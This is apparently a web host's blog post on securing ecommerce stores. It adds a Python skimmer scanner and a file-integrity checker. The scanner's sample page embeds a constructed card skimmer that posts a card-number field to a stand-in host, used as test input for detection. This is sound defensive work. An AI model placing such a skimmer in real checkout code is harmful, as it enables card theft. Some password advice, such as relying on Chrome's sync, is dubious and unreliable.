Keep Your Ecommerce Store Secure
Keeping your ecommerce store secure from hackers is something every store owner must address on a continual basis. It’s not a “one and done” type of approach. As a web host, we see a lot of compromised accounts and stores. They affect all types of ecommerce solutions such as ShopSite, Magento, and WooCommerce.
We’ll take a look at the types of compromise we see, how hackers use these break-ins to their advantage, and some simple steps to keep your online store safe and secure. Follow-up posts will address steps to take for specific ecommerce solutions.
Three categories of hacks
For the most part, when an ecommerce store is “hacked” or compromised, it falls into one of three categories:
1. Admin login details obtained through malware on a PC
This is becoming more of an issue these days. Hackers get malware onto a computer where the admin password is typed or stored insecurely. The malware either logs keystrokes or harvests any passwords it can find, and passes this information on to the hacker network.
2. Vulnerable or outdated plugins, extensions, or software that hackers compromise
This is the most common type of hacking we see. Store owners run old software that has not been updated and contains a vulnerability that a hacker exploits. Once exploited, the hackers can often upload files, gain admin access, and take over a site/store easily.
3. FTP/ssh credentials obtained through malware on a PC (or insecure wifi)
This is another trend that is growing in popularity. FTP passwords are obtained through malware on a PC that harvests the passwords stored in FTP programs, and then FTP is used to upload malicious files into a website. We’ve also seen people who used public wifi and connected via plain FTP (which sends the password unencrypted) get their passwords stolen.
What do hackers do?
Once access is gained, hackers can do many things (all of which we have seen) such as:
Download order data to try and obtain sensitive info
Hackers have downloaded data from a store to obtain credit card numbers, customer emails, customer logins, and more.
Edit software files
Edits are made to try and skim credit card data as customers enter it. We’ve seen some creative hacks, including emailing card data, storing it in an image file on the site that the hackers download periodically, and using an external JavaScript call to send data offsite, disguised to look like a Google Analytics snippet of code.
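The disguised-script and inline-skimmer cases above are the kind of thing a store owner can check for in their own theme and template files. The following is an added example (not code from the original post or from the host) of a small Python heuristic scan: it flags external scripts loaded from hosts outside an allowlist, calls out the ones dressed up as analytics snippets, and flags inline scripts that both read checkout fields and send data somewhere. The allowlist hosts, the field-name patterns and the sample page are assumptions constructed for the example; a real store would list its own CDN and analytics providers.

```python
"""Heuristic scan of storefront HTML/template files for script tags that do not
belong. Added example for illustration, not the host's or any project's code."""
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# Hosts the store legitimately loads scripts from (assumed for this example).
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "www.google-analytics.com",
    "cdn.example-store.invalid",  # constructed placeholder for the store's own CDN
}

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
# Names commonly bound to checkout inputs (assumed); used to spot inline scripts
# that read them.
PAYMENT_FIELD = re.compile(r"\b(card[_-]?number|cc[_-]?num|cvv|cvc|expir)", re.IGNORECASE)
# Ways a script can push data off-site.
EXFIL_SINK = re.compile(r"\b(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\b)|\.src\s*=", re.IGNORECASE)


def host_of(src):
    """Host part of a script src; protocol-relative URLs are treated as https."""
    if src.startswith("//"):
        src = "https:" + src
    return urlparse(src).hostname or ""


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (reason, snippet) findings for one document."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        m = SRC_ATTR.search(attrs)
        if m:
            src = m.group(1)
            host = host_of(src)
            # Relative paths (host == "") are the store's own files; skip them here.
            if host and host not in allowed_hosts:
                reason = "external script from unlisted host"
                # A host that merely resembles an analytics domain is the disguise
                # the post describes, so say so explicitly.
                if "analytics" in src.lower() or "google" in host:
                    reason += " (looks like an analytics snippet)"
                findings.append((reason, src))
        elif PAYMENT_FIELD.search(body) and EXFIL_SINK.search(body):
            findings.append(("inline script reads payment fields and sends data",
                             " ".join(body.split())[:80]))
    return findings


def scan_files(paths):
    """Scan each file and return {path: findings} for files with at least one hit."""
    report = {}
    for p in paths:
        hits = find_suspicious_scripts(Path(p).read_text(errors="replace"))
        if hits:
            report[str(p)] = hits
    return report


# Constructed sample page: one legitimate tag, one local file, one look-alike
# analytics host, one inline script touching a card field, one harmless inline script.
SAMPLE_PAGE = """<html><head>
<script src="https://www.googletagmanager.com/gtag/js?id=UA-0000"></script>
<script src="/js/checkout.js"></script>
<script src="//stats.google-analytics-cdn.invalid/analytics.js"></script>
</head><body>
<script>
  var n = document.getElementById('card_number').value;
  fetch('https://collector.invalid/', {method: 'POST', body: n});
</script>
<script>console.log('legit inline script');</script>
</body></html>"""

if __name__ == "__main__":
    # Usage: python scan_scripts.py theme/*.html templates/*.phtml
    # With no arguments, scan the constructed sample page.
    if len(sys.argv) > 1:
        for path, hits in scan_files(sys.argv[1:]).items():
            for reason, snippet in hits:
                print(f"{path}: {reason}: {snippet}")
    else:
        for reason, snippet in find_suspicious_scripts(SAMPLE_PAGE):
            print(f"{reason}: {snippet}")
```

The scan is a heuristic, not a proof of compromise: a finding means "look at this file", and the allowlist needs to be kept current as the store adds legitimate third-party scripts. Run it against the theme and template directories after any suspicious event and, ideally, as part of the same daily routine as a file scan.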
Install malware on the website
Why? To spread more malware of course!
Create backdoor admin users or scripts
This allows access in the future for further attacks. This is a common technique.
Send spam/phishing emails through your website
This is a popular option for hackers who gain access to websites.
How to keep safe
There are a number of steps you can take to minimize this risk:
Use a hard to guess password, change it frequently
This is an easy one to do. Many ecommerce applications allow an unlimited number of login attempts. If the password is easy to guess, an attacker has a good chance of getting it.
Changing your password frequently is good practice. Maybe you gave the login to someone to help with an issue, or it’s been stored on multiple computers for a while. Keeping the password up to date reduces the risk it could be compromised accidentally.
Do not give out your passwords to just anyone
It’s an obvious one, but think before giving someone access to your store or admin panel. Do they really need that access? Can you create a limited account for them, restricting them to only the options they need to see/edit?
Also try to avoid emailing a password to someone. Email is not always secure, and you have no way to know what the person receiving the email does with that email in terms of keeping it safe.
Remove or change logins once work is done
This is one of the most common points of failure that leads to compromise. A login is created for a developer or third party, or the main login is given to them. When they are done, the password is not changed or the login is not removed. Sometime in the future the developer’s computer is compromised by malware, and the attackers now have access to your store.
Please remember to restrict access once work is complete from an outside party.
Do not store passwords insecurely in your computer
Do you save your logins in your web browser? Keep the password stored in an FTP program for easy access? Unless you know that the software uses strong encryption or two-factor authentication, it’s a hotbed for hackers to obtain logins.
Consider using a password manager such as LastPass, 1Password, KeePass, or others. This will help secure your passwords. At a minimum, if you let the browser save passwords, use only Google Chrome while logged into Google with browser sync enabled, so that you get its more secure password management service.
Keep software up to date
Make sure your ecommerce software is kept up to date with the latest releases. This applies to the add-ons, plugins, and extensions you have installed as well. If you use other applications on your website like a WordPress blog, keep that up to date to avoid it being an entry point that leads to your ecommerce store being broken into.
To keep up to date, subscribe to your ecommerce company’s newsletter and blog, keep up with industry news related to the applications you use, or ask your developer or web host if you are up to date.
Scan your website for malware
There are many options for having this done. Services such as Sucuri are one. You can also check your Google Search Console (formerly Google Webmaster Tools) account to see if any alerts are posted about your site being compromised.
If you’re hosted with us, we perform a daily malware scan on all files for all clients.
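A daily file scan of the kind mentioned above rests on knowing what the store's files looked like when they were last known good. As an added example (not the host's own scanner or any project's code), here is a small Python file-integrity baseline: it records a SHA-256 digest of every file under the web root, and on later runs reports files that were added, removed or modified since the baseline. The skipped cache/log directory names, the manifest file name and the constructed demo web root are assumptions for the example.

```python
"""File-integrity baseline for a web root. Added example for illustration,
not the host's own malware scanner."""
import hashlib
import json
import sys
import tempfile
from pathlib import Path

# Directories that change legitimately on every request and would only add noise
# (assumed names; adjust to the store's layout).
SKIP_DIRS = {"cache", "var/cache", "var/log", "var/session"}
MANIFEST_NAME = "integrity-baseline.json"  # assumed; keep it outside the web root


def sha256_of(path, chunk=1 << 16):
    """SHA-256 digest of a file, read in chunks so large uploads do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if any(rel == d or rel.startswith(d + "/") for d in SKIP_DIRS):
            continue
        manifest[rel] = sha256_of(p)
    return manifest


def diff_manifests(baseline, current):
    """Files added, removed or changed between two manifests, each list sorted."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(f for f in common if baseline[f] != current[f]),
    }


def demo():
    """Constructed web root: baseline it, then simulate the traces a compromise
    leaves behind (an edited core file, a new PHP file in an upload directory)
    plus a cache regeneration that should be ignored."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'store'; ?>")
        (root / "js").mkdir()
        (root / "js" / "checkout.js").write_text("// checkout logic")
        (root / "cache").mkdir()
        (root / "cache" / "page.html").write_text("cached")
        baseline = build_manifest(root)
        # Changes after the baseline (constructed):
        (root / "js" / "checkout.js").write_text("// checkout logic\n// extra line")
        (root / "images").mkdir()
        (root / "images" / "logo.php").write_text("<?php /* unexpected */ ?>")
        (root / "cache" / "page.html").write_text("regenerated")  # inside SKIP_DIRS
        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    # Usage: python integrity.py /path/to/webroot   (first run writes the baseline,
    # later runs report differences). With no argument, run the constructed demo.
    if len(sys.argv) > 1:
        root = Path(sys.argv[1])
        manifest_path = root.parent / MANIFEST_NAME
        current = build_manifest(root)
        if not manifest_path.exists():
            manifest_path.write_text(json.dumps(current, indent=1))
            print(f"baseline written: {len(current)} files -> {manifest_path}")
        else:
            baseline = json.loads(manifest_path.read_text())
            print(json.dumps(diff_manifests(baseline, current), indent=1))
    else:
        print(json.dumps(demo(), indent=1))
```

The important habits are to take the baseline right after a clean install or update (and refresh it after every legitimate deployment), to store the manifest where a web shell cannot rewrite it, and to treat any new executable file in an upload or image directory as a finding to investigate rather than noise.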
Hopefully this helps highlight some simple measures you can put in place to keep your store safe. Look for follow-up blog posts on keeping your ShopSite, Magento, and WooCommerce stores secure.
Looking for a web host that understands ecommerce and business hosting?
Check us out today!